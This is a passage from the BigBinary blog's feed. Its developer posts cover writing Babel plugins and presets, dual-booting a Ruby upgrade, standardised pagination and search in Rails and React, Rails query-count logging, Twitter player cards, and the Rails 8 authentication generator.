&quot;Identifier&quot;,            &quot;name&quot;: &quot;b&quot;          }        }      }    ]  }}</code></pre><p>Here, our goal is to modify the <code>BinaryExpression</code> node with the operator <code>==</code>to <code>===</code>. To achieve this, we need to create a visitor method for the<code>BinaryExpression</code>. When Babel encounters a <code>BinaryExpression</code> node with theoperator <code>==</code> in the AST, it will call our visitor method to apply thetransformation.</p><p>So, let's write the code for our plugin. Open the <code>index.js</code> file we createdearlier and add the following code:</p><pre><code class="language-js">module.exports = function () {  return {    visitor: {      BinaryExpression(path) {        if (path.node.operator === &quot;==&quot;) {          path.node.operator = &quot;===&quot;;        }      },    },  };};</code></pre><p>This plugin will traverse the AST, identify <code>BinaryExpression</code> nodes with the<code>==</code> operator, and replace them with <code>===</code>, ensuring strict equality checks areused throughout the code.</p><p>Now that we have written the plugin code, let's see how to test it.</p><h3>Adding tests for the plugin</h3><p>To ensure that our plugin works as expected, we need to write tests. For this,we can use the<a href="https://www.npmjs.com/package/babel-plugin-tester">babel-plugin-tester</a> and<a href="https://www.npmjs.com/package/jest?activeTab=readme">jest</a> packages.<code>babel-plugin-tester</code> is a utility that makes it easy to test Babel plugins,while <code>jest</code> is a popular testing framework for JavaScript. Let's see how we canadd tests for our plugin.</p><ul><li><p><strong>Step 1:</strong> Install the required packages:</p><pre><code class="language-bash">yarn add --dev babel-plugin-tester jest</code></pre></li><li><p><strong>Step 2:</strong> Create a folder named <code>tests</code> in the project directory. Insidethis folder, create a test file named <code>strict-equality.spec.js</code> with thefollowing content:</p><pre><code class="language-js">const pluginTester = require(&quot;babel-plugin-tester&quot;);const plugin = require(&quot;../index&quot;);pluginTester({  plugin,  tests: {    &quot;should convert == to ===&quot;: {      code: &quot;a == b;&quot;,      output: &quot;a === b;&quot;,    },    &quot;should not modify == inside a string or comment&quot;: {      code: `        const str = &quot;a == b&quot;;        // comparison: a == b      `,      output: `        const str = &quot;a == b&quot;;        // comparison: a == b      `,    },  },});</code></pre><p>In the code above, we are passing an object to the <code>pluginTester</code> functionwith two keys: <code>plugin</code> and <code>tests</code>. The <code>plugin</code> key specifies the Babelplugin we want to test, while the <code>tests</code> key contains an object defining ourtest cases. Each test case includes a <code>code</code> key with the input code and an<code>output</code> key with the expected result after the plugin is applied. The<code>pluginTester</code> function runs each test case, comparing the actual output withthe expected output. If they match, the test passes; if they dont, it fails.</p></li><li><p><strong>Step 3:</strong> Now to run the tests, use the following command:</p><pre><code class="language-bash">yarn jest</code></pre><p>This will run the tests and display the results in the terminal. If the testpasses, it means our plugin is working as expected.</p><p><img src="/blog_images/2024/how-to-build-your-own-babel-plugins/jest-result.png" alt="jest-result"></p></li></ul><h3>Testing the plugin in a real project using yalc</h3><p>While <code>pluginTester</code> helps cover many edge cases, its challenging to anticipateall possible scenarios. For this, we need to run our rules in real projects andwe will have to achieve this without publishing our package to the remoteregistry right away.</p><p>To achieve this, we can use the <a href="https://www.npmjs.com/package/yalc">yalc</a>package. <code>yalc</code> is a tool that allows us to work on the npm packages as if theywere published, but without actually publishing them. It creates a symlink toour local package in the global npm registry, allowing us to install and use itin other projects. Let's see how we can use <code>yalc</code> to test our plugin.</p><ul><li><p><strong>Step 1:</strong> Install <code>yalc</code> globally.</p><pre><code class="language-bash">yarn global add yalc</code></pre></li><li><p><strong>Step 2:</strong> Publish the plugin using <code>yalc</code> by running the following commandin the plugin directory.</p><pre><code class="language-bash">yalc publish</code></pre><p>This creates a symlink to the local package in the global npm registry.</p></li><li><p><strong>Step 3:</strong> Install the plugin in the project using <code>yalc</code> by running thefollowing command in the project directory.</p><pre><code class="language-bash">yalc add babel-plugin-strict-equality</code></pre><p>This will add the plugin to the project as if it were installed from npmregistry.</p></li><li><p><strong>Step 4:</strong> Include the plugin in the Babel configuration.</p><pre><code class="language-json">{  &quot;plugins&quot;: [&quot;babel-plugin-strict-equality&quot;]}</code></pre></li></ul><p>After testing the plugin in a real project and being satisfied with the results,it can be published to the npm registry.</p><h3>Creating a Babel preset</h3><p>If we have multiple plugins that we want to bundle together, we can create aBabel preset. As mentioned earlier, presets make it easier to configure Babel bybundling related plugins together. Here is an example of how we can create aBabel preset that includes the <code>babel-plugin-strict-equality</code> plugin:</p><ul><li><p><strong>Step 1</strong>: Create a new directory for the preset and initialize a new npmpackage for the preset. Let's prefix the package name with <code>babel-preset-</code> toindicate that it is a Babel preset.</p><pre><code class="language-bash">mkdir babel-preset-strict-equalitycd babel-preset-strict-equalitynpm init -y</code></pre></li><li><p><strong>Step 2</strong>: Create a folder named <code>plugins</code> in the root of the presetdirectory. This folder will contain the plugins that we want to include in thepreset. In our case, we have only one plugin, so create a file named<code>strict-equality.js</code> inside the <code>plugins</code> folder and add our plugin code toit.</p><pre><code class="language-js">module.exports = function () {  return {    visitor: {      BinaryExpression(path) {        if (path.node.operator === &quot;==&quot;) {          path.node.operator = &quot;===&quot;;        }      },    },  };};</code></pre></li><li><p><strong>Step 3</strong>: Create a file named <code>index.js</code> in the root of the presetdirectory. This file will contain the logic for bundling the plugins together.</p><pre><code class="language-js">const strictEquality = require(&quot;./plugins/strict-equality.js&quot;);module.exports = function () {  return {    plugins: [strictEquality],  };};</code></pre><p>Here we are returning an object with a <code>plugins</code> key that contains an array ofplugins to be included in the preset. If there are multiple plugins, we canlist them all in this array. We can now publish this preset to the npmregistry and use it in our Babel configuration.</p></li><li><p><strong>Step 4</strong>: To use the preset in the Babel configuration, include it likethis:</p><pre><code class="language-json">{  &quot;presets&quot;: [&quot;babel-preset-strict-equality&quot;]}</code></pre></li></ul><p>Here we have created a simple Babel plugin and preset. This is just the tip ofthe iceberg when it comes to creating custom Babel plugins. We can createplugins to handle a wide range of tasks, from optimizing code to adding newfeatures. To know more about the functions and methods available in Babel, youcan refer to the<a href="https://github.com/jamiebuilds/babel-handbook/blob/master/translations/en/plugin-handbook.md">Babel handbook</a>.In the next section, we will see the use case we encountered at Neeto and how wesolved it using a custom Babel plugin.</p><h2>Motivation behind babel-preset-neeto</h2><p>At <a href="https://neeto.com/">Neeto</a>, we build our own custom plugins and presets tostreamline and simplify our development workflow. Let's look into one of thespecific plugins we've designed and implemented and see how it enhances ourdevelopment process.</p><p>We use <a href="https://github.com/pmndrs/zustand">Zustand</a> for global state management.Zustand provides <code>shallow</code> function, which allows us to construct a singleobject with multiple state-picks inside. This helps prevent unnecessaryre-renders by using shallow equality to check if the selected state values havechanged. Let's consider the following example:</p><pre><code class="language-js">import { shallow } from &quot;zustand/shallow&quot;;const { id, name } = useSessionStore(  store =&gt; ({    id: store[sessionId]?.user.id,    name: store[sessionId]?.user.name,  }),  shallow);</code></pre><p>In this example, the component only re-renders if <code>id</code> or <code>name</code> changes. If anyother state in the store changes, the component will not re-render. Thissignificantly improves performance. To know how this works, you can refer tothis<a href="https://www.bigbinary.com/blog/upgrading-react-state-management-with-zustand">blog post</a>.However, when dealing with many state selections, the code can become verboseand repetitive. For example, consider the following code:</p><pre><code class="language-js">import { shallow } from &quot;zustand/shallow&quot;;const {  id,  name,  email,  notifications,  theme,  language,  isAuthenticated,  apiToken,  appVersion,  darkModeEnabled,} = useSessionStore(  store =&gt; ({    id: store[sessionId]?.user.id,    name: store[sessionId]?.user.name,    email: store[sessionId]?.user.email,    notifications: store[sessionId]?.user.notifications,    theme: store[sessionId]?.user.theme,    language: store[sessionId]?.user.language,    isAuthenticated: store[sessionId]?.user.isAuthenticated,    apiToken: store[sessionId]?.user.apiToken,    appVersion: store[sessionId]?.user.appVersion,    darkModeEnabled: store[sessionId]?.user.darkModeEnabled,  }),  shallow);</code></pre><p>This is really repetitive, for each state, we need to add a line on left andright side of the code. Then we thought, what if we can infer the right sidefrom the left side of the code. This will make the code more readable and lesserror-prone. But this is not possible with the custom functions or hooks becausethey operate at runtime and cannot modify the structure of the code duringtranspilation. This is where custom Babel plugins come into play. We have builta<a href="https://github.com/bigbinary/babel-preset-neeto/blob/main/docs/zustand-pick.md">Zustand pick transformer</a>capable of generating the boilerplate at the time of transpiling the code.</p><p>If this plugin is added to the babel configuration, we can rewrite the previousexample as:</p><pre><code class="language-js">const {  id,  name,  email,  notifications,  theme,  language,  isAuthenticated,  apiToken,  appVersion,  darkModeEnabled,} = useSessionStore.pick([sessionId, &quot;user&quot;]);</code></pre><p>The array inside <code>pick()</code> is the path of the nested object to be accessed. Youmight also notice that we don't have the<code>import { shallow } from &quot;zustand/shallow&quot;</code> statement in this piece of code. Wedon't need that. The plugin will automatically add it for us at the time oftranspiling.</p><p>The plugin detects that <code>id</code>, <code>name</code>, <code>email</code>, and other properties are to beaccessed from the <code>store[sessionId].user</code> in <code>useSessionStore</code>, and it generatescode for it. It will also add optional chaining for all the nested propertiesautomatically to make the picks free from null-pointer errors.</p><p>For more information about the plugin, refer to the<a href="https://github.com/bigbinary/babel-preset-neeto/blob/main/docs/zustand-pick.md">documentation</a>.To see the implementation of the plugin, check the<a href="https://github.com/bigbinary/babel-preset-neeto/blob/main/src/plugins/zustand-pick/index.js">source code</a></p><p>We've open-sourced this preset package so that it's accessible for use in yourprojects as well. To include this preset, install it using the followingcommand:</p><pre><code class="language-bash">yarn add -D @bigbinary/babel-preset-neeto</code></pre><p>And then include it in the Babel configuration:</p><pre><code class="language-json">{  &quot;presets&quot;: [&quot;@bigbinary/neeto&quot;]}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Upgrade Ruby using dual boot]]></title>
       <author><name>Vijay Vinod</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-upgrade-using-dual-boot"/>
      <updated>2024-09-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-upgrade-using-dual-boot</id>
      <content type="html"><![CDATA[<p>Recently, we upgraded all <a href="https://www.neeto.com/">neeto</a> product's Ruby versionfrom 3.2.2 to 3.3.0 using &quot;dual-booting&quot;.</p><p>Dual-booting is a process that allows you to run your application with differentsets of dependencies, making it easy to switch between them. This approachenables you to quickly test your code with both the current and the newerversion of what you are upgrading, ensuring that everything works smoothlybefore fully committing to the upgrade.</p><h4>How to dual-boot Ruby?</h4><p>The dual-boot technique involves maintaining two separate <code>Gemfile.lock</code> fileswithin your Rails project: one for the current version of Ruby and another forthe next version you're upgrading to.</p><p>To get started, first create a symbolic link for <code>Gemfile.next</code> with thefollowing command:</p><pre><code class="language-bash">ln -s Gemfile Gemfile.next</code></pre><p>This command creates <code>Gemfile.next</code> file, which you'll use for the new Rubyversion. This file isn't a separate copy but rather a pointer to your original<code>Gemfile</code> in the Rails project directory.</p><p>Next, add the following snippet at the top of your <code>Gemfile</code>:</p><pre><code class="language-ruby">def next?  File.basename(__FILE__) == &quot;Gemfile.next&quot;end</code></pre><p>This code snippet helps determine which <code>Gemfile</code> is in use, whether it's thestandard one or the <code>Gemfile.next</code> for the new Ruby version.</p><p>Now, let's utilize the <code>next?</code> method to dynamically set the Ruby version in the<code>Gemfile</code> using a conditional operator:</p><pre><code class="language-ruby">ruby_version = next? ? &quot;3.3.0&quot; : &quot;3.2.2&quot;ruby ruby_version</code></pre><p>This code snippet helps determine the Ruby version based on the <code>next?</code> method.If <code>next?</code> returns true, meaning you're operating within <code>Gemfile.next</code>, it setsthe Ruby version to &quot;3.3.0&quot;. Otherwise, if the standard <code>Gemfile</code> is beingprocessed, it defaults to &quot;3.2.2&quot;.</p><h4>How to install dependencies?</h4><p>With the dual-boot setup in place, you can effectively manage dependencies forboth your current and next versions of the application.</p><p>Installing current dependencies: To install dependencies for your currentversion, simply run:</p><pre><code class="language-bash">bundle install</code></pre><p>This command uses the standard <code>Gemfile</code> to resolve and install dependencies foryour current application.</p><p>Installing next dependencies: To install dependencies for the next version ofyour application, use the following command:</p><pre><code class="language-bash">BUNDLE_GEMFILE=Gemfile.next bundle install</code></pre><p>This command specifies <code>Gemfile.next</code> as the <code>Gemfile</code>, allowing you to installdependencies specifically for the next version.</p><p>Managing commands for the next version: To perform various operations for thenext version, you can use the syntax <code>BUNDLE_GEMFILE=Gemfile.next &lt;command&gt;</code>.For example, to start the Rails server with the next version's dependencies, youwould use:</p><pre><code class="language-bash">BUNDLE_GEMFILE=Gemfile.next rails s</code></pre><p>This approach ensures that <code>Gemfile.next</code> is explicitly used for the specifiedcommand, allowing you to work with the next version of your application whilekeeping dependencies and configurations correctly managed.</p><h4>Considerations for dual-boot setup</h4><p>When implementing a dual-boot setup, it's crucial to consider where both Rubyand gem versions are defined. While gem versions are usually specified only inthe <code>Gemfile</code>, the Ruby version can be defined in several locations. The mostcommon are:</p><ul><li><code>.ruby-version</code> File: Used by version managers like rbenv to specify the Rubyversion.</li><li><code>Gemfile</code>: This is where Bundler, RVM, Heroku, and similar tools reference theRuby version to manage the Ruby environment.</li><li><code>Gemfile.lock</code>: Although the Ruby version in this file is mostly informative,it's worth noting.</li><li><code>Dockerfile</code>: Defines the Ruby version for Docker containers if you're usingDocker.</li><li>CI setup steps and configurations.</li><li>Other less common locations within applications.</li></ul><p>We need to make sure that dual-boot setup is compatible with all of them toensure a smooth transition and consistency across different environments.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Simplifying code with standardized pagination, sorting, and search]]></title>
       <author><name>Abilash Sajeev</name></author>
      <link href="https://www.bigbinary.com/blog/standardize-pagination-keywords"/>
      <updated>2024-08-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/standardize-pagination-keywords</id>
      <content type="html"><![CDATA[<p><a href="https://www.neeto.com">Neeto</a> is a collection of products. Here, we standardizeboilerplate and repetitive code into<a href="https://blog.neeto.com/p/nanos-make-neeto-better">Nanos</a>. The search, sorting,and pagination functionalities are essential for every listing page. We realizedthat each product had its own custom implementations for these operations,resulting in a lot of duplicated code. We wanted this logic to be abstracted andhandled uniformly.</p><h2>Sorting and pagination</h2><p>If you have worked with tables, you may already be familiar with the followingcode. In this example, we are using the<a href="https://neeto-ui.neeto.com/?path=/docs/components-table--docs">Table</a> componentfrom <a href="https://neeto-ui.neeto.com/">NeetoUI</a>. It is the developer'sresponsibility to handle the sorting and pagination logic, make the API callswith an updated payload, and ensure that the URL is updated accordingly.</p><pre><code class="language-javascript">import React, { useState } from &quot;react&quot;;import { Table } from &quot;@bigbinary/neetoui&quot;;const Teams = () =&gt; {  const [page, setPage] = useState(1);  const [sortBy, setSortBy] = useState(null);  const [orderBy, setOrderBy] = useState(null);  const handleSort = ({ sortBy, orderBy }) =&gt; {    setSortBy(sortBy);    setOrderBy(orderBy);    // Custom sort logic  };  const handlePageChange = page =&gt; {    setPage(page);    // Custom pagination logic.  };  const { data: teams, isLoading } = useFetchTeams({ page, sortBy, orderBy });  return (    &lt;Table      currentPageNumber={page}      handlePageChange={handlePageChange}      onChange={(_, __, sorter) =&gt; handleSort(sorter)}      {...{ totalCount, rowData, columnData, ...otherProps }}    /&gt;  );};export default Teams;</code></pre><p>To make both the frontend and backend more standardized and reusable, weestablished some conventions. The NeetoUI Table will handle both sorting andpagination internally. When the user navigates to a different page, NeetoUI willupdate the <code>page</code> and <code>page_size</code> query parameters in the URL.</p><p>Similarly, when a column is sorted, the <code>sort_by</code> and <code>order_by</code> queryparameters are updated. We no longer need a dedicated state to store thesevalues. When the query parameter changes, the API will be called with themodified payload.</p><p>Here is what the simplified code looks like:</p><pre><code class="language-javascript">import React from &quot;react&quot;;import { Table } from &quot;@bigbinary/neetoui&quot;;import { useQueryParams } = &quot;@bigbinary/neeto-commons-frontend/react-utils&quot;const Teams = () =&gt; {  const { page, sortBy, orderBy } = useQueryParams();  const { data: teams, isLoading } = useFetchTeams({ page,                                                     sortBy,                                                     orderBy });  return (    &lt;Table {...{ totalCount, rowData, columnData, ...otherProps }} /&gt;  );};export default Teams;</code></pre><p>Here, we utilize a <code>useQueryParams</code> utility helper. It parses the URL andreturns the query parameters after converting them to camel case.</p><p>We noticed that a similar cleanup can be done on the backend side. Afterestablishing a consistent variable naming convention for <code>page</code>, <code>page_size</code>,<code>order_by</code>, and <code>sort_by</code> in every listing page, it became easier to createcommon utility functions for the backend. Here's what it looks like:</p><pre><code class="language-ruby">module Filterable  extend ActiveSupport::Concern  include Pagy::Backend  def sort_and_paginate(records)    sorted_records = apply_sort(records)    apply_pagination(sorted_records)  end  def apply_sort(records)    records.order(sort_by =&gt; order_by)  end  def sort_by    params[:sort_by].presence || &quot;created_at&quot;  end  def order_by    case params[:order_by]&amp;.downcase    when &quot;asc&quot;, &quot;ascend&quot;      &quot;ASC&quot;    when &quot;desc&quot;, &quot;descend&quot;      &quot;DESC&quot;    else      &quot;ASC&quot;    end  end  def apply_pagination(records)    pagination_method = records.is_a?(ActiveRecord::Relation) ? :pagy : :pagy_array    pagy, paginated_records = send(pagination_method, records, page: params[:page], items: params[:page_size])    [pagy, paginated_records]  endend</code></pre><p>The <code>apply_pagination</code> helper method can be used to paginate the results. Ituses the <code>Pagy</code> gem internally to perform the pagination. It provides a genericmethod <code>pagy</code> that works with <code>ActiveRecord</code> out of the box. It also provides a<code>pagy_array</code> method which paginates an array of records. Both these methodsreturns a <code>Pagy</code> instance along with the paginated records.</p><p>The <code>apply_sort</code> method sorts the given records based on a specified column nameand direction. By default, records are sorted in ascending order of <code>created_at</code>timestamps, but this can be customized by specifying values for <code>sort_by</code> and<code>order_by</code> params. As sorting and pagination are common requirements of thelisting pages, we also added a <code>sort_and_paginate</code> method which performs boththese operations on provided records.</p><h2>Searching</h2><p>Searching is a common functionality in any web application. Developers need toensure that the results are refetched whenever the search term changes. Thedebouncing logic is added to minimize API requests and improve user experience.As you can see in the below snippet, we had to maintain a dedicated state forsearch term as well.</p><pre><code class="language-javascript">import React, { useState } from &quot;react&quot;;import { useDebounce } from &quot;@bigbinary/neeto-commons-frontend/react-utils&quot;;import { useFetchTeams } from &quot;hooks/reactQuery/useFetchTeamsApi&quot;;const Teams = () =&gt; {  const [searchString, setSearchString] = useState(&quot;&quot;);  const debouncedSearchString = useDebounce(searchString.trim());  const { data: teams, isLoading } = useFetchTeams(debouncedSearchString);  return (    &lt;Input      type=&quot;search&quot;      value={searchString}      onChange={({ target: { value } }) =&gt; setSearchString(value)}    /&gt;  );};export default Teams;</code></pre><p>As we standardized the naming pattern for the search term, we were able to directlyincorporate the search term value into the URL query parameters. This helped usto retrieve the search term, eliminating the need for a separate state.</p><p>We also introduced a new component in<a href="https://neeto-molecules.neeto.com">NeetoMolecules</a>, to handle the searchfunctionality in all products. This<a href="https://neeto-molecules.neeto.com/?path=/docs/search--docs">Search</a> componentwill internally handle the debounced updates when the search term changes. Itwill also update the <code>search_term</code> query param in URL. Here is what thesimplified code looks like:</p><pre><code class="language-javascript">import React from &quot;react&quot;;import Search from &quot;@bigbinary/neeto-molecules/Search&quot;;import { useFetchTeams } from &quot;hooks/reactQuery/useFetchTeamsApi&quot;;const Teams = () =&gt; {  const { searchTerm = &quot;&quot; } = useQueryParams();  const { data: teams, isLoading } = useFetchTeams(searchTerm);  return &lt;Search /&gt;;};export default Teams;</code></pre><p>We also updated the <code>Filterable</code> concern mentioned earlier to simplify the logicin the backend. The <code>search_term</code> method retrieves the keyword specified in theURL query parameters, while <code>search?</code> checks whether the results should befiltered based on any keyword.</p><pre><code class="language-ruby">module Filterable  extend ActiveSupport::Concern  # ... previous code  def search_term    filter_params[:search_term]  end  def search?    search_term.present?  endend</code></pre><p>Let's consolidate everything in the <code>TeamsController</code>. In the following code, weneed to fetch all the teams belonging to an organization, filter them based onthe search term and return the results after sorting and pagination.</p><pre><code class="language-ruby">def index  if params[:search_string].present?    @teams = @organization.teams.filter_by_name(params[:search_string])  end  @teams = @teams    .order(params[:column] =&gt; params[:direction])    .page(params[:current_page])    .per(params[:limit])end</code></pre><p>We were able to simplify this logic with the help of the methods provided by the<code>Filterable</code> concern. As you can see below, this helped us in removing a lot ofboilerplate code and improving the readability.</p><pre><code class="language-ruby">def index  @teams = @organization.teams.filter_by_name(search_term) if search?  @teams = sort_and_paginate(@teams)end</code></pre><p>This standardized approach helped us to extract and centralize the common logic.It also accelerated the development and maintenance cycle as the code structureis now clear and consistent across all the products.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.2 brings SQL queries count to template rendering logs]]></title>
       <author><name>Navaneeth D</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-adds-sql-queries-count-to-template-rendering-logs"/>
      <updated>2024-08-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-adds-sql-queries-count-to-template-rendering-logs</id>
      <content type="html"><![CDATA[<p>For Rails developers, debugging database queries is a frequent task. Whetherit's addressing the notorious N+1 query problem or fine-tuning cachingstrategies, developers often find themselves diving into logs to scrutinize SQLquery counts.</p><p>Traditionally, this involved manually inspecting the logs and counting thenumber of queries. Needless to say, this becomes tedious and error-prone foractions generating a significant number of queries in the order of tens orhundreds.</p><p>Thankfully, Rails 7.2 introduces a helpful improvement by enhancing the logoutput to include the query count alongside existing information.</p><p><img src="/blog_images/2024/rails-8-adds-sql-queries-count-to-template-rendering-logs/sql-query-count-in-template-log.gif" alt="sql-query-count-in-template-log"></p><p>The improved log output now includes the query count within the ActiveRecordsection. It shows <code>3 queries, 1 cached</code>, indicating that three database querieswere executed, with one being served from the cache.</p><p>This seemingly small addition allows for quick identification of query volumeand potential optimization areas. You can easily see if caching is workingeffectively and if the number of queries aligns with expectations, savingdevelopers valuable time and effort.</p><p>Check <a href="https://github.com/rails/rails/pull/51457">this pull request</a> for moredetails:</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Twitter player cards to improve accessibility of NeetoRecord]]></title>
       <author><name>Bonnie Simon</name></author>
      <link href="https://www.bigbinary.com/blog/adding-twitter-player-cards-to-neetorecord"/>
      <updated>2024-08-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/adding-twitter-player-cards-to-neetorecord</id>
      <content type="html"><![CDATA[<p>At Neeto, we're building multiple products, and we love sharing our progress andupdates on Twitter. We often accompany our tweets with NeetoRecord recordings togive you an even closer look at our work. However, we noticed that users had toleave Twitter to view our videos, creating unnecessary friction in theirexperience.</p><h4>The Problem</h4><p>Initially, when we shared a NeetoRecord video on Twitter, this is how the tweetwould appear.</p><p><img src="/blog_images/2024/adding-twitter-player-cards-to-neetorecord/no-embed.png" alt="Link with no embed"></p><p>As we can see, the links are just plain text, lacking visual appeal and context.Users had to click away from Twitter and open a new tab to view the recording.This extra step not only disrupted the user's Twitter experience but also likelyreduced the number of people who actually watched our videos.</p><h4>The Solution: Twitter Cards</h4><p>To address this issue, we turned to Twitter Cards. Similar to Facebook's OpenGraph protocol, Twitter Cards allows us to showcase interactive media directlywithin tweets. While both protocols serve similar purposes, Twitter cards aredesigned to directly work in Twitter, so its crawler will look for these tagsand only look for OG tags as a fallback.</p><h4>What are Twitter Cards?</h4><p>Twitter Cards are a set of meta tags that enable us to embed interactive contenton a tweet. In our case, we want to provide users an embedded video player whichthey can use to view the NeetoRecord recording without leaving Twitter. It's notjust about aesthetics. According to Twitter's own data, &quot;tweets with cards have43% higher engagement rates than regular tweets with links.&quot; This statisticunderscores the impact of providing a seamless, visually appealing experience.</p><h4>Implementing Twitter Cards for NeetoRecord</h4><p>There are multiple types of cards that we can leverage to enhance our contentsuch as summary cards, player cards &amp; app cards. However, in this post, we aregoing to be discussing about Player cards, which is implemented in NeetoRecord.This card type allows us to embed an interactive video player directly in thetweet. Here's how it looks:</p><p><img src="/blog_images/2024/adding-twitter-player-cards-to-neetorecord/player-embed.png" alt="Embed player"></p><p>Clicking on this link preview will open our embedded content, in this case, aplayer to view the recording directly within Twitter.</p><p><img src="/blog_images/2024/adding-twitter-player-cards-to-neetorecord/player-embed-expanded.png" alt="Expanded player"></p><p>As we can see, users can now watch our NeetoRecord videos without leavingTwitter. This seamless experience has several benefits:</p><ul><li>Higher Engagement: With the video right there in the tweet, more users arelikely to watch it.</li><li>Reduced Friction: No more clicking away or opening new tabs, keeping usersengaged with our content and the Twitter conversation.</li><li>Better Branding: The Player Card includes our logo and video title,reinforcing our brand with every view.</li></ul><h4>Technical Implementation</h4><p>Implementing Twitter Cards is straightforward. We added meta tags to the<code>&lt;head&gt;</code> section of our web page. For our Player Card, we use tags as shownbelow.</p><pre><code class="language-html">&lt;meta property=&quot;twitter:card&quot; content=&quot;player&quot; /&gt;&lt;meta  property=&quot;twitter:url&quot;  content=&quot;https://oli.neetorecord.com/watch/864de7fb-2efb-4f2f-a60b-08dca64e4c3&quot;/&gt;&lt;meta  property=&quot;twitter:title&quot;  content=&quot;Introducing the new video player for NeetoRecord&quot;/&gt;&lt;meta property=&quot;twitter:site&quot; content=&quot;@NeetoRecord&quot; /&gt;&lt;meta property=&quot;twitter:image&quot; content=&quot;https://cdn.neeto.com/hycoe7&quot; /&gt;&lt;meta  property=&quot;twitter:player&quot;  content=&quot;https://oli.neetorecord.com/embeds/864de7fb-2efb-4f2f-a60b-08dca64e4c3&quot;/&gt;&lt;meta property=&quot;twitter:player:width&quot; content=&quot;1280&quot; /&gt;&lt;meta property=&quot;twitter:player:height&quot; content=&quot;720&quot; /&gt;</code></pre><p>These tags tell Twitter's crawler what to display in the card.</p><p>Let's break down the purpose and importance of each meta tag:</p><pre><code class="language-html">&lt;meta property=&quot;twitter:card&quot; content=&quot;player&quot; /&gt;</code></pre><p>This tag specifies the card type. Setting it to &quot;player&quot; tells Twitter that thisis a Player Card, which is designed for video or audio content.</p><pre><code class="language-html">&lt;meta  property=&quot;twitter:url&quot;  content=&quot;https://oli.neetorecord.com/watch/864de7fb-2efb-4f2f-a60b-08dca64e4c3&quot;/&gt;</code></pre><p>This tag provides the URL of the web page that the card is describing. It shouldbe the page where users can view the full content.</p><pre><code class="language-html">&lt;meta  property=&quot;twitter:title&quot;  content=&quot;Introducing the new video player for NeetoRecord&quot;/&gt;</code></pre><p>This tag sets the title of the card, which appears as the main headline.</p><pre><code class="language-html">&lt;meta property=&quot;twitter:site&quot; content=&quot;@NeetoRecord&quot; /&gt;</code></pre><p>This tag specifies the Twitter @username the card should be attributed to.</p><pre><code class="language-html">&lt;meta property=&quot;twitter:image&quot; content=&quot;https://cdn.neeto.com/hycoe7&quot; /&gt;</code></pre><p>This tag provides the image to be displayed in place of the player on platformsthat dont support iFrames or inline players.</p><pre><code class="language-html">&lt;meta  property=&quot;twitter:player&quot;  content=&quot;https://oli.neetorecord.com/embeds/864de7fb-2efb-4f2f-a60b-08dca64e4c3&quot;/&gt;</code></pre><p>This crucial tag specifies the URL of the video player. This should be an HTTPSURL to an iframe player that can play the content.</p><pre><code class="language-html">&lt;meta property=&quot;twitter:player:width&quot; content=&quot;1280&quot; /&gt;&lt;meta property=&quot;twitter:player:height&quot; content=&quot;720&quot; /&gt;</code></pre><p>These two tags define the width and height of the video player iframe, inpixels. They help ensure the video displays correctly in the Twitter feed.</p><h4>Conclusion</h4><p>Twitter Cards have improved how NeetoRecord videos are shared on Twitter. Theembedded media experience reduces friction and increases engagement, whileenhancing our brand visibility.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 8 introduces a basic authentication generator]]></title>
       <author><name>Jaimy Simon</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-introduces-a-basic-authentication-generator"/>
      <updated>2024-08-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-introduces-a-basic-authentication-generator</id>
      <content type="html"><![CDATA[<p>DHH recently posted the following in an issue titled<a href="https://github.com/rails/rails/issues/50446">Add basic authentication generator</a>.</p><blockquote><p>Rails now include all the key building blocks needed to do basicauthentication, but many new developers are still uncertain of how to put themtogether, so they end up leaning on all-in-one gems that hide the mechanics.</p></blockquote><p>To address this, Rails 8 has introduced a generator that simplifies the additionof basic authentication to Rails applications. In this blog post, we'll explorethe components included in this authentication scaffold.</p><h2>Adding authentication to your Rails application</h2><p>To set up a basic authentication system in your Rails application, execute thefollowing code.</p><pre><code class="language-bash">bin/rails generate authentication</code></pre><p>This command generates a set of essential files that provide a foundationalstart for implementing authentication, including support for database-trackedsessions and password reset functionality. Here is the<a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3">gist</a>of the generated scaffold.</p><p>Lets examine the components created by the authentication generator.</p><h3>Models &amp; migrations</h3><p>To lay the groundwork for handling user accounts and session management, themodels<a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-user-rb"><code>User</code></a>,<a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-current-rb"><code>Current</code></a>and<a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-session-rb"><code>Session</code></a>are set up along with their corresponding migrations. This setup includes:</p><ul><li><p><a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-xxxxxxx_create_users-rb"><code>CreateUsers</code></a>migration: It creates a <code>users</code> table, with a uniquely indexed <code>email_address</code>field and <code>password_digest</code> for storing the securely hashed passwords using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveModel/SecurePassword/ClassMethods.html#method-i-has_secure_password"><code>has_secure_password</code></a>.</p></li><li><p><a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-xxxxxxx_create_sessions-rb"><code>CreateSessions</code></a>migration: It sets up the <code>sessions</code> table, which includes a unique <code>token</code>field, along with <code>ip_address</code> and <code>user_agent</code> fields to record the user'sdevice and network details. The <code>Session</code> model uses<a href="https://api.rubyonrails.org/v7.1.3.4/classes/ActiveRecord/SecureToken/ClassMethods.html"><code>has_secure_token</code></a>to generate unique session tokens.</p></li><li><p>The <code>Current</code> model manages per-request state and provides access to thecurrent user's information through a delegated <code>user</code> method.</p></li><li><p>Additionally, the <a 